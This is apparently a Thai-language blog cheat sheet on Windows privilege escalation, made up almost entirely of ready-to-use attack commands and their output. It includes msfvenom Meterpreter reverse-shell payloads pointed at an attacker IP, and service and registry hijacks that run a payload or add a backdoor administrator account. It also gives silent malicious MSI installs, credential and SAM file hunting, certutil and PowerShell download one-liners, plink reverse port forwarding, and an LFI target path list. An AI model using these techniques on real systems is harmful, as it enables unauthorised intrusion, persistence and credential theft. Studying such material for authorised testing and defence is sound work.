Windows Privilege Escalation – Cheat Sheet
อันนี้เป็นการทำสรุปวิธีการพยายามทำ Privilege Escalation ใน Windows ครับ
Unquoted Service Paths
หา service ที่ไม่ได้ทำ Quoted Path ครับ
1 |
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ |
ซึ่งถ้าโดยปกติแล้วมันควรจะเป็น
1 |
“C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe” |
แต่หากเจอว่าเป็น
1 |
C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe |
แสดงว่าเวลา Windows มันทำงานมันจะหาไฟล์เพื่อมารันตามนี้ครับ
1 2 3 4 5 |
C:\Program.exe C:\Program Files.exe C:\Program Files (x86)\Program.exe C:\Program Files (x86)\Program Folder\A.exe C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe |
ซึ่งหากเราสร้าง exe ไว้ใน path ใด path หนึ่งก็จะทำให้ service นั้นๆรัน exe ของเราแทนที่จะเป็น “C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe” นั่นเอง
1 2 3 4 5 6 7 8 9 |
meterpreter > shell Process 4024 created. Channel 1 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Users\testuser\Desktop>wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """ Vulnerable Service Vulnerable Service C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe Auto C:\Users\testuser\Desktop> |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
meterpreter > shell Process 1884 created. Channel 4 created. Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. C:\Program Files (x86)\Program Folder>icacls "C:\Program Files (x86)\Program Folder" icacls "C:\Program Files (x86)\Program Folder" C:\Program Files (x86)\Program Folder Everyone:(OI)(CI)(F) NT SERVICE\TrustedInstaller:(I)(F) NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) NT AUTHORITY\SYSTEM:(I)(F) NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) BUILTIN\Administrators:(I)(F) BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) BUILTIN\Users:(I)(RX) BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) CREATOR OWNER:(I)(OI)(CI)(IO)(F) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) Successfully processed 1 files; Failed processing 0 files C:\Program Files (x86)\Program Folder> |
Insecure Registry Permissions
อันนี้เป็นเรื่องของ service ใดๆที่มีการกำหนด permission ใน HKLM\SYSTEM\CurrentControlSet\Services registry key แล้วไม่ secure คือใครจะแก้ไขก็ได้อะไรแบบเนี้ยก็จะกลายเป็นว่าเราสามารถที่จะเข้าไปแก้ไข path การรันไฟล์ของ service ได้นั่นเอง โดยเราสามารถใช้เครื่องมือที่ชื่อว่า SubInACL ในการตรวจสอบสิทธิ์ได้ครับ ถ้าหากมีการกำหนดให้ AlwaysInstallElevated registry นั้นเป็น True อยู่มันก็กลายเป็นว่าใครจะติดตั้ง application ก็ได้ เราก็จะติดตั้ง SubInACL ได้นั่นเองครับ
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 |
C:\Users\testuser\AppData\Local\Temp>subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display subinacl.exe /keyreg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service" /display SeSecurityPrivilege : Access is denied. WARNING :Unable to set SeSecurityPrivilege privilege. This privilege may be required. ================================================================================ +KeyReg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Vulnerable Service ================================================================================ /control=0x400 SE_DACL_AUTO_INHERITED-0x0400 /owner =builtin\administrators /primary group =system /perm. ace count =10 /pace =everyone ACCESS_ALLOWED_ACE_TYPE-0x0 CONTAINER_INHERIT_ACE-0x2 Key and SubKey - Type of Access: Full Control Detailed Access Flags : KEY_QUERY_VALUE-0x1 KEY_SET_VALUE-0x2 KEY_CREATE_SUB_KEY-0x4 KEY_ENUMERATE_SUB_KEYS-0x8 KEY_NOTIFY-0x10 KEY_CREATE_LINK-0x20 DELETE-0x10000 READ_CONTROL-0x20000 WRITE_DAC-0x40000 WRITE_OWNER-0x80000 . . . . . . C:\Users\testuser\AppData\Local\Temp> |
จะเห็นว่า
1 |
/pace =everyone ACCESS_ALLOWED_ACE_TYPE-0x0 |
ใครก็สามารถเปลี่ยนแปลงได้ ดังนั้นหากเราสร้าง payload แล้วแก้ไขค่า ImagePath ก็จะทำให้ service รัน payload ของเราแทนปกติครับ
1 |
C:\Users\testuser\AppData\Local\Temp>reg add "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Vulnerable Service" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\testuser\AppData\Local\Temp\Payload.exe" /f |
สั่งเครื่อง restart เพื่อให้เครื่อง restart ด้วย
1 |
shutdown /r /t 0 |
Insecure Service Permissions
อันนี้มันจะคล้ายๆกับ Insecure Registry Permission แต่แทนที่จะเปลี่ยน registry ก็ไปเปลี่ยน service properties แทนครับ
เราสามารถใช้ AccessChk tool จาก SysInternals Suite. ในการตรวจสอบ service permission ได้
1 2 3 4 5 6 7 8 |
C:\Users\testuser\AppData\Local\Temp>accesschk.exe -uwcqv "testuser" * accesschk.exe -uwcqv "TestUser" * Accesschk v6.02 - Reports effective permissions for securable objects Copyright (C) 2006-2016 Mark Russinovich Sysinternals - www.sysinternals.com RW Vulnerable Service SERVICE_ALL_ACCESS C:\Users\testuser\AppData\Local\Temp> |
หากพบว่า SERVICE_ALL_ACCESS นั่นหมายความว่าเราสามารถเข้าไปแก้ไขได้ทุกอย่างในตัว service เลย หากเราต้องการดู stats ของ Service ใช้คำสั่งเป็น
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
C:\Users\testuser\AppData\Local\Temp>sc qc "Vulnerable Service" sc qc "Vulnerable Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Vulnerable Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Program Folder\A Subfolder\Executable.exe LOAD_ORDER_GROUP : UIGroup TAG : 0 DISPLAY_NAME : Vulnerable Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\testuser\AppData\Local\Temp> |
แก้ไข path สำหรับการรัน service
1 2 3 4 |
C:\Users\testuser\AppData\Local\Temp>sc config "Vulnerable Service" binpath= "net user eviladmin P4ssw0rd@ /add" sc config "Vulnerable Service" binpath= "net user eviladmin P4ssw0rd@ /add" [SC] ChangeServiceConfig SUCCESS C:\Users\testuser\AppData\Local\Temp> |
จากนั้น start, stop service
1 2 |
sc stop "Vulnerable Service" sc start "Vulnerable Service" |
Insecure File/Folder Permissions
อันนี้จะคล้ายๆกับ Unquoted Path vulnerability ครับ เพียงแต่ว่าเราเช็ค permission ของ path ที่เก็บไฟล์ exe ของ service นั้นๆแล้วแปะทับไปแบบโต้งๆเลยครับ
1 |
C:\Program Files (x86)\Program Folder>icacls "C:\Program Files (x86)\Program Folder\A Subfolder" |
AlwaysInstallElevated
อันนี้เป็นตัวที่เราใช้ตอนติดตั้ง SubInACL จะพบว่า AlwaysInstallElevated มันเป็นตัวที่อนุญาตให้ user สามารถติดตั้ง msi file ได้เลยโดยที่ไม่ต้องเป็น Administrator นั่นเอง ซึ่งหากเป็นแบบนั้นเราก็สามารถจะติดตั้งไฟล์ installer ได้เองเลยนั่นเอง
1 2 3 4 5 |
[HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] “AlwaysInstallElevated”=dword:00000001 |
ตรวจสอบ
1 |
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated |
สร้าง payload
1 2 3 4 5 |
msfvenom -f msi-nouac -p windows/adduser USER=eviladmin PASS=P4ssw0rd@ -o add_user.msi หรือ <span class="co1">msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe msfvenom -f msi-nouac -p windows/exec cmd="C:\Users\testuser\AppData\Local\Temp\Payload.exe" > malicious.msi </span> |
ติดตั้ง msi
1 |
msiexec /quiet /qn /i malicious.msi |
Privilege Escalation with Task Scheduler
วิธีการสร้าง task scheduler เพื่อทำ privilege escalation นั้นทำได้กับ Windows 2000, XP, หรือ 2003 machine เท่านั้นเนื่องด้วย scheduled tasks ใน Windows version เหล่านั้นถูกรันด้วยสิทธิ์ของ SYSTEM นั่นเอง ซึ่งเราจำเป็นต้องมีสิทธิ์ของ local administrator ก่อนถึงจะทำได้ครับ
1 |
msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai LHOST=192.168.2.60 LPORT=8989 -f exe -o Payload.exe |
start schedule task service
1 |
net start "Task Scheduler" |
สร้าง task schedule
1 |
at 06:42 /interactive "C:\Documents and Settings\test\Local Settings\Temp\Payload.exe" |
จากนั้นรอไปถึงเวลา 06:42 รอให้ payload รัน
DLL Hijacking
DLL Hijacking เป็นการบังคับให้ exe ใดๆหรือ service ใดๆที่พยายามจะโหลด dll ใดๆ มาใช้ dll ของเราแทน ซึ่งปกติแล้วเวลาที่ exe หา dll ที่ระบุไว้ มันจะไปหาใน path ต่างๆดังนี้
- The directory from which the application loaded.
- The system directory.
- The 16-bit system directory.
- The Windows directory.
- The current directory.
- The directories that are listed in the PATH environment variable.
เวลา exe ถูกโหลดขึ้นมา มันจะไปไล่หา dll ตามลำดับด้านบน หากเรานำ dll ที่มีชื่อเดียวกันที่ตัวโปรแกรมหาไปไว้ในตำแหน่งของ folder ที่อยู่อันดับต้นๆได้ หรือก่อน dll ที่เป็นจริงได้ ตัวโปรแกรมก็จะไปโหลดโปรแกรมเราแทนนั่นเอง เช่น ถ้า C:\Program Files\vulnserver\vulnerability.exe โหลดขึ้นมาแล้วโหลด payload.dll ซึ่งปกติอยู่ใน C:\Windows หากเราสร้าง malicious dll แล้วใช้ชื่อ payload.dll ไปไว้ที่ path C:\Program Files\vulnserver\ ได้ ก็จะกลายเป็นว่า vulnerability.exe โหลด payload.dll ของเราแทนที่จะเป็น C:\Windows\payload.dll นั่นเอง
เราสามารถตรวจสอบได้ว่า exe ใดๆจะทำการโหลด dll อะไรโดยใช้ Procmon
Stored Credentials
อันนี้เป็นเรื่องผิดพลาดของ user เองที่ดันเก็บ password ไว้ในไฟล์ต่างๆ
- C:\unattend.xml
- C:\sysprep.inf
- C:\sysprep\sysprep.xml
หรือใช้คำสั่งหาไฟล์ที่น่าจะเก็บ password
- dir c:\*vnc.ini /s /b /c
- dir c:\*ultravnc.ini /s /b /c
- dir c:\ /s /b /c | findstr /si *vnc.ini
- findstr /si password *.txt | *.xml | *.ini
- findstr /si pass *.txt | *.xml | *.ini
Kernel Exploits
ใช้คำสั่ง wmic เพื่อดู patch
1 |
wmic qfe get Caption,Description,HotFixID,InstalledOn |
แล้วค่อยโจมตีจากช่องโหว่ที่มันยังไม่ได้ patch ครับ
นอกเหนือจากข้างต้นแล้ว ก็ยังมีส่วนการทำ Information Gathering ด้วยเช่นกันครับ
Information Gathering
OS Information
1 2 |
systeminfo wmic qfe |
Environment Information
1 2 |
set Get-ChildItem Env: | ft Key,Value |
Connected Device
1 2 3 |
net use wmic logicaldisk get caption,description,providername Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root |
Users information
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 |
#Current user whoami echo %USERNAME% $env:UserName #Privilege of current user whoami /priv # Any old user profiles that weren’t cleaned up net users dir /b /ad "C:\Users\" dir /b /ad "C:\Documents and Settings\" # Windows XP and below Get-LocalUser | ft Name,Enabled,LastLogon Get-ChildItem C:\Users -Force | select Name # current logged in user qwinsta # List group of user net localgroup Get-LocalGroup | ft Name # List user in admin group net localgroup Administrators Get-LocalGroupMember Administrators | ft Name, PrincipalSource # Information of registry for user logon reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*" # Credential Manager cmdkey /list |
SAM File
1 2 3 4 5 6 7 8 9 10 11 12 |
# Can we access SAM and SYSTEM files? %SYSTEMROOT%\repair\SAM %SYSTEMROOT%\System32\config\RegBack\SAM %SYSTEMROOT%\System32\config\SAM %SYSTEMROOT%\repair\system %SYSTEMROOT%\System32\config\SYSTEM %SYSTEMROOT%\System32\config\RegBack\system |
Installed Software
1 2 3 4 5 |
dir /a "C:\Program Files" dir /a "C:\Program Files (x86)" reg query HKEY_LOCAL_MACHINE\SOFTWARE Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name |
Full Permissions for Everyone or Users on Program Folders?
1 2 3 4 |
icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" |
Modify Permissions for Everyone or Users on Program Folders?
1 2 3 4 |
icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" |
Upload accesschk from Sysinternals to check for writeable folders and files
1 2 3 |
accesschk.exe -qwsu "Everyone" * accesschk.exe -qwsu "Authenticated Users" * accesschk.exe -qwsu "Users" * |
Running processes/services on the system
1 2 3 4 |
tasklist /svc tasklist /v net start sc query |
Any weak service permissions? Can we reconfigure anything? Again, upload accesschk.
1 2 3 |
accesschk.exe -uwcqv "Everyone" * accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv "Users" * |
Scheduled tasks
1 2 3 |
schtasks /query /fo LIST 2>nul | findstr TaskName dir C:\windows\tasks Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State |
Startup service and process
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
wmic startup get caption,command reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup" dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce' Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce' Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup" |
Networking
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 |
# network information ipconfig /all # Route table route print Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex # ARP Cache arp -a # Connection to another host? netstat -ano # Host file C:\WINDOWS\System32\drivers\etc\hosts # Firewall status netsh firewall show state netsh firewall show config netsh advfirewall firewall show rule name=all netsh advfirewall export "firewall.txt" # Interface configuration netsh dump # SNMP Configuration reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse |
Interesting Files and Sensitive Information
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 |
# passwords in the registry reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s # Is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files? dir /a C:\inetpub\ dir /s web.config C:\Windows\System32\inetsrv\config\applicationHost.config Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue # IIS Log C:\inetpub\logs\LogFiles\W3SVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\W3SVC2\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC1\u_ex[YYMMDD].log C:\inetpub\logs\LogFiles\FTPSVC2\u_ex[YYMMDD].log # XAMPP, Apache, or PHP configuration files? dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf Get-Childitem –Path C:\ -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue # interesting files to look at inside User directories (Desktop, Documents, etc)? dir /s *pass* == *vnc* == *.config* 2>nul Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue # Files containing password inside them? findstr /si password *.xml *.ini *.txt *.config 2>nul Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" |
Transfer files
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
# Powershell Cmdlet (Powershell 3.0 and higher) Invoke-WebRequest "https://myserver/filename" -OutFile "C:\Windows\Temp\filename" #Powershell One-Liner (New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:\Windows\Temp\filename") # Powershell Script echo $webclient = New-Object System.Net.WebClient >>wget.ps1 echo $url = "http://IPADDRESS/file.exe" >>wget.ps1 echo $file = "output-file.exe" >>wget.ps1 echo $webclient.DownloadFile($url,$file) >>wget.ps1 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 # Non-interactive FTP via text file. Useful for when you only have limited command execution. echo open 10.10.10.11 21> ftp.txt echo USER username>> ftp.txt echo mypassword>> ftp.txt echo bin>> ftp.txt echo GET filename>> ftp.txt echo bye>> ftp.txt ftp -v -n -s:ftp.txt # Using Certutil certutil.exe -urlcache -split -f https://myserver/filename outputfilename |
Port forwarding
1 2 3 4 |
#Upload plink.exe to target. #Start SSH on your attacking machine. #For example to expose SMB, on the target run: plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS |
อันนี้เอาไว้ Reference สำหรับการทำ LFI ครับ
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 |
C:\Apache\conf\httpd.conf C:\Apache\logs\access.log C:\Apache\logs\error.log C:\Apache2\conf\httpd.conf C:\Apache2\logs\access.log C:\Apache2\logs\error.log C:\Apache22\conf\httpd.conf C:\Apache22\logs\access.log C:\Apache22\logs\error.log C:\Apache24\conf\httpd.conf C:\Apache24\logs\access.log C:\Apache24\logs\error.log C:\Documents and Settings\Administrator\NTUser.dat C:\php\php.ini C:\php4\php.ini C:\php5\php.ini C:\php7\php.ini C:\Program Files (x86)\Apache Group\Apache\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache\logs\access.log C:\Program Files (x86)\Apache Group\Apache\logs\error.log C:\Program Files (x86)\Apache Group\Apache2\conf\httpd.conf C:\Program Files (x86)\Apache Group\Apache2\logs\access.log C:\Program Files (x86)\Apache Group\Apache2\logs\error.log c:\Program Files (x86)\php\php.ini" C:\Program Files\Apache Group\Apache\conf\httpd.conf C:\Program Files\Apache Group\Apache\conf\logs\access.log C:\Program Files\Apache Group\Apache\conf\logs\error.log C:\Program Files\Apache Group\Apache2\conf\httpd.conf C:\Program Files\Apache Group\Apache2\conf\logs\access.log C:\Program Files\Apache Group\Apache2\conf\logs\error.log C:\Program Files\FileZilla Server\FileZilla Server.xml C:\Program Files\MySQL\my.cnf C:\Program Files\MySQL\my.ini C:\Program Files\MySQL\MySQL Server 5.0\my.cnf C:\Program Files\MySQL\MySQL Server 5.0\my.ini C:\Program Files\MySQL\MySQL Server 5.1\my.cnf C:\Program Files\MySQL\MySQL Server 5.1\my.ini C:\Program Files\MySQL\MySQL Server 5.5\my.cnf C:\Program Files\MySQL\MySQL Server 5.5\my.ini C:\Program Files\MySQL\MySQL Server 5.6\my.cnf C:\Program Files\MySQL\MySQL Server 5.6\my.ini C:\Program Files\MySQL\MySQL Server 5.7\my.cnf C:\Program Files\MySQL\MySQL Server 5.7\my.ini C:\Program Files\php\php.ini C:\Users\Administrator\NTUser.dat C:\Windows\debug\NetSetup.LOG C:\Windows\Panther\Unattend\Unattended.xml C:\Windows\Panther\Unattended.xml C:\Windows\php.ini C:\Windows\repair\SAM C:\Windows\repair\system C:\Windows\System32\config\AppEvent.evt C:\Windows\System32\config\RegBack\SAM C:\Windows\System32\config\RegBack\system C:\Windows\System32\config\SAM C:\Windows\System32\config\SecEvent.evt C:\Windows\System32\config\SysEvent.evt C:\Windows\System32\config\SYSTEM C:\Windows\System32\drivers\etc\hosts C:\Windows\System32\winevt\Logs\Application.evtx C:\Windows\System32\winevt\Logs\Security.evtx C:\Windows\System32\winevt\Logs\System.evtx C:\Windows\win.ini C:\xampp\apache\conf\extra\httpd-xampp.conf C:\xampp\apache\conf\httpd.conf C:\xampp\apache\logs\access.log C:\xampp\apache\logs\error.log C:\xampp\FileZillaFTP\FileZilla Server.xml C:\xampp\MercuryMail\MERCURY.INI C:\xampp\mysql\bin\my.ini C:\xampp\php\php.ini C:\xampp\security\webdav.htpasswd C:\xampp\sendmail\sendmail.ini C:\xampp\tomcat\conf\server.xml |
Source:: pentest.blog, sploitspren, sploitspren#2, MemoryCorruption